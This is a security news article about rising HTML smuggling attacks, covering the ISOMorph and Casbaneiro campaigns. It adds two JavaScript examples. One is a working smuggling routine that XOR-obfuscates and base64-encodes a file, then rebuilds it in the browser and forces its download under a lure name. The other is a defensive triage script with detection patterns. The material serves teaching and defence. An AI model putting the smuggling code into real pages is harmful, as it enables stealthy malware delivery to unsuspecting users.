Reports Point to Uptick in HTML Smuggling Attacks

Published: 23/11/2024   Category: security




Menlo Security and Microsoft report recent campaigns implementing the technique, which helps attackers stealthily deliver malware.



HTML smuggling may not be a new technique, but it is drawing new attention as a threat to watch, with recent reports of attack campaigns using the method to stealthily deliver malware.
The tactic helps attackers bypass network security tools by using features of HTML5 and JavaScript (the anchor `download` attribute, the Blob object and blob: object URLs) to deliver file downloads. Most tools monitor the data coming in and out of the network and flag suspicious content based on patterns or signatures. With HTML smuggling, no file crosses the network as a file: what crosses is HTML and script, and the payload is constructed within the browser on the target device, so it often slips past unnoticed.
HTML smuggling doesn't exploit a vulnerability or design flaw in the browser; it uses the browser as designed. Attackers might include a link in an email that, when clicked, redirects to an HTML page that uses HTML and JavaScript code to assemble the payload within the browser. Alternatively, they may send an HTML attachment along with a message convincing the victim to download and open it.
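To make "constructed within the browser" concrete, the following is an added example written for this page; it is not code from Menlo Security's or Microsoft's reports and is not taken from the ISOMorph campaign. It shows both halves of a smuggling drop: what an attacker's generator does once to produce the string embedded in the HTML, and what the page's script does in the victim's browser to turn that string back into a file and hand it to the download handler. The XOR key, the file name and the sample bytes are invented; the XOR layer stands in for the string obfuscation such pages commonly carry so that the base64 of a known file type is not visible to a static scanner.

```javascript
// Added example, not vendor or campaign code. Runs in a browser as the body of a
// <script>; under Node the decode half runs and dropFile() returns null (no DOM).

const XOR_KEY = "s3cr3t";             // assumed: short key hiding the payload's base64 from static scanners
const DROP_NAME = "invoice_2024.zip"; // assumed: name the victim's browser will save the file under

// Attacker side (run once by a generator): XOR the file bytes, then base64 them.
function encodeForPage(bytes, key) {
  let bin = "";
  for (let i = 0; i < bytes.length; i++) {
    bin += String.fromCharCode(bytes[i] ^ key.charCodeAt(i % key.length));
  }
  return btoa(bin);
}

// Page side: reverse the encoding byte for byte. This is the "construction in the
// browser"; the network only ever saw the base64 text inside the HTML.
function decodePayload(b64, key) {
  const bin = atob(b64);
  const out = new Uint8Array(bin.length);
  for (let i = 0; i < bin.length; i++) {
    out[i] = bin.charCodeAt(i) ^ key.charCodeAt(i % key.length);
  }
  return out;
}

// ZIP local file header magic "PK\x03\x04".
function looksLikeZip(bytes) {
  return bytes.length >= 4 && bytes[0] === 0x50 && bytes[1] === 0x4b &&
         bytes[2] === 0x03 && bytes[3] === 0x04;
}

// Page side: wrap the bytes in a Blob, mint a blob: URL for it, and click a hidden
// anchor carrying the HTML5 download attribute. Returns the URL scheme used, or
// null when there is no DOM (e.g. under Node).
function dropFile(bytes, name) {
  if (typeof document === "undefined") return null;
  const blob = new Blob([bytes], { type: "application/octet-stream" });
  const url = URL.createObjectURL(blob); // blob:... URL; never fetched from any server
  const a = document.createElement("a");
  a.href = url;
  a.download = name;                     // forces "save as" instead of navigation
  document.body.appendChild(a);
  a.click();
  a.remove();
  URL.revokeObjectURL(url);
  return url.split(":")[0];
}

// Constructed sample "file": a ZIP header followed by text, not a real archive.
const SAMPLE_BYTES = new Uint8Array([
  0x50, 0x4b, 0x03, 0x04,
  ...new TextEncoder().encode("constructed sample, not a real archive"),
]);

// This string is what the generator would embed in the HTML page.
const SMUGGLED = encodeForPage(SAMPLE_BYTES, XOR_KEY);

// What the page does when it loads.
function runSmuggledPage() {
  const bytes = decodePayload(SMUGGLED, XOR_KEY);
  return { bytes, isZip: looksLikeZip(bytes), dropped: dropFile(bytes, DROP_NAME) };
}
```

The point for defenders is the last function: nothing in it requests the file from a server, so a proxy or sandbox that only inspects HTTP responses sees an HTML page with a text blob in it, and the ZIP exists only after the script has run on the endpoint.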
"An attack could start with a phishing email or Web browsing," says Vinay Pidathala, director of security research at Menlo Security, where the team has been tracking an HTML smuggling campaign called ISOMorph.
In this campaign, once a victim clicks a malicious link or downloads an attachment, the first-stage payload is an ISO file — a file type often preferred by attackers because it doesn't require any third-party software to open, Menlo Security researchers note in a blog post. This ISO file contains a malicious script that, once executed, fetches additional PowerShell scripts. Researchers identified several different malicious scripts being used in this campaign.
"After they click the link, everything is constructed on the browser itself," Pidathala says.
The malicious PowerShell script checks for, and disables, antivirus systems. It also downloads additional payloads from Discord, which attackers used to host malicious payloads for this campaign. Pidathala says this is noteworthy, as the chat platform reportedly has over 150 million active users who use it to communicate via text and voice messages.
ISOMorph's final payload is a remote access Trojan (RAT) called AsyncRAT/NJRAT, which has been used by many attackers in the past but predominantly to compromise high-value targets in the Middle East, researchers report. The team is still analyzing this attack activity and cannot share details about the targets or who the attackers are.
The ISOMorph campaign isn't the only one in recent years to make use of HTML smuggling. Last summer, Menlo Security's team identified another campaign, called Duri, which similarly leveraged the technique to deliver malware.
Microsoft's security team has also recently reported that attackers are increasingly using HTML smuggling, in phishing and other email campaigns, to deliver threats. In a campaign the team has been tracking for weeks, attackers send emails with malicious links that, when clicked, drop components embedded in an HTML page via HTML smuggling.
This ultimately leads to dropping a ZIP archive containing a JavaScript file on a target machine, Microsoft Security Intelligence wrote in a Twitter thread. The JavaScript file connects to a malicious website to download another ZIP file with a .PNG file extension; this contains two dynamic link libraries (DLLs) and one executable file. One of the DLLs is the final payload: a banking Trojan named Casbaneiro, which is loaded using DLL sideloading, researchers report.
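Both stages described on this page leave something a gateway or endpoint agent can look at: the HTML attachment or landing page carries the browser-side drop pattern, and the second-stage download arrives with an extension (.PNG) that does not match its contents (a ZIP). The following is an added example, written for this page and not part of Menlo Security's or Microsoft's tooling, of two cheap triage checks for exactly those two stages. The indicator weights, the flagging threshold and the sample attachments are constructed; treat the scores as a starting point for tuning, not as a detection rule to deploy as-is.

```javascript
// Added example, not vendor tooling. scoreHtml() looks for the browser-side drop
// pattern in an HTML attachment; extensionMismatch() catches a container whose
// magic bytes contradict its file extension. All weights and samples are constructed.

const INDICATORS = [
  { re: /URL\.createObjectURL\s*\(/,     weight: 3, why: "blob: object URL created" },
  { re: /msSaveOrOpenBlob/,              weight: 3, why: "legacy IE/Edge blob save" },
  { re: /new\s+Blob\s*\(/,               weight: 2, why: "Blob built in script" },
  { re: /\.download\s*=|\sdownload\s*=/, weight: 2, why: "download attribute set" },
  { re: /\batob\s*\(/,                   weight: 1, why: "base64 decoded in script" },
  { re: /\.click\s*\(\s*\)/,             weight: 1, why: "programmatic click" },
  { re: /[A-Za-z0-9+\/]{1024,}={0,2}/,   weight: 2, why: "large base64-looking literal" },
];
const FLAG_AT = 5; // assumed threshold; tune against your own attachment corpus

function scoreHtml(html) {
  const hits = INDICATORS.filter((i) => i.re.test(html));
  const score = hits.reduce((s, i) => s + i.weight, 0);
  return { score, flagged: score >= FLAG_AT, reasons: hits.map((i) => i.why) };
}

// Magic bytes for the container types the campaigns above use.
function sniffType(bytes) {
  const at = (off, sig) =>
    bytes.length >= off + sig.length && sig.every((b, i) => bytes[off + i] === b);
  if (at(0, [0x50, 0x4b, 0x03, 0x04])) return "zip";
  if (at(0, [0x89, 0x50, 0x4e, 0x47])) return "png";
  if (at(0, [0x4d, 0x5a])) return "exe";                   // MZ header: EXEs and DLLs alike
  if (at(0x8001, [0x43, 0x44, 0x30, 0x30, 0x31])) return "iso"; // "CD001", ISO 9660 primary volume descriptor
  return null;
}

function extensionMismatch(name, bytes) {
  const ext = name.toLowerCase().split(".").pop();
  const real = sniffType(bytes);
  if (real === null) return false;        // unknown content: make no claim either way
  const aliases = { dll: "exe" };
  return (aliases[ext] || ext) !== real;
}

// Constructed samples: an ordinary page and one carrying a smuggling drop.
const BENIGN_HTML = `<html><body><h1>Quarterly report</h1>
<form action="/submit"><input name="q"><button>Send</button></form>
<script>document.querySelector("h1").textContent += " (2024)";</script></body></html>`;

// The long run of "A" stands in for an embedded base64 payload.
const SMUGGLING_HTML = `<html><body><script>
var d = "${"A".repeat(1200)}";
var b = atob(d), u8 = new Uint8Array(b.length);
for (var i = 0; i < b.length; i++) u8[i] = b.charCodeAt(i);
var blob = new Blob([u8], {type: "application/octet-stream"});
var a = document.createElement("a"); a.href = URL.createObjectURL(blob);
a.download = "report.zip"; document.body.appendChild(a); a.click();
</script></body></html>`;

const FAKE_PNG = new Uint8Array([0x50, 0x4b, 0x03, 0x04, 0x14, 0x00, 0x00, 0x00]); // ZIP bytes, .png name
const REAL_PNG = new Uint8Array([0x89, 0x50, 0x4e, 0x47, 0x0d, 0x0a, 0x1a, 0x0a]);

function triage() {
  return {
    benign: scoreHtml(BENIGN_HTML),
    smuggling: scoreHtml(SMUGGLING_HTML),
    fakePngMismatch: extensionMismatch("update.png", FAKE_PNG),
    realPngMismatch: extensionMismatch("logo.png", REAL_PNG),
  };
}
```

The regex stage is deliberately crude: real smuggling pages split strings, rename `atob` through an alias, or decode the payload with a custom routine, all of which defeat these patterns, which is why the second check (what actually lands on disk, and whether it is what its name claims) is the more robust of the two and belongs on the endpoint rather than on the wire.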
A Growing Threat
In the blog post on their findings, Menlo Security researchers say the re-emergence of HTML smuggling could be linked to the global increase in remote work. Because it helps attackers bypass sandboxes, legacy proxies, and firewalls, the method could appeal to attackers seeking to target people who spend many hours working remotely using browser-based applications.
"The most crucial aspect is the evasion aspect," says Pidathala. "A typical enterprise has X number of network security appliances, and half the battle for the attacker is done when they're able to get their payload onto the endpoint … using HTML smuggling, they're able to do half of what they need to successfully compromise the endpoint."
The use of HTML smuggling among high-profile attack groups could also be driving the increase. Nobelium, the group behind last year's SolarWinds supply chain attack, also used the tactic, Microsoft reports in a breakdown of the group's techniques.
Attackers' use of Discord in the ISOMorph campaign should be a sign for organizations to take a closer look at the cloud applications they use, Pidathala adds. This isn't the first attack campaign to use Discord; however, it's interesting to see both the chat app and HTML smuggling used together to evade detection.
"It's super important that enterprises understand their cloud application posture," Pidathala says, noting they should understand what cloud applications are needed for their business and what are not needed, and then outright block such kind of cloud applications.
The use of legitimate applications in cybercrime makes it even easier for these attacks to fly under the radar. Pidathala adds: "It's getting extremely difficult for security practitioners to identify what's good and what's bad."





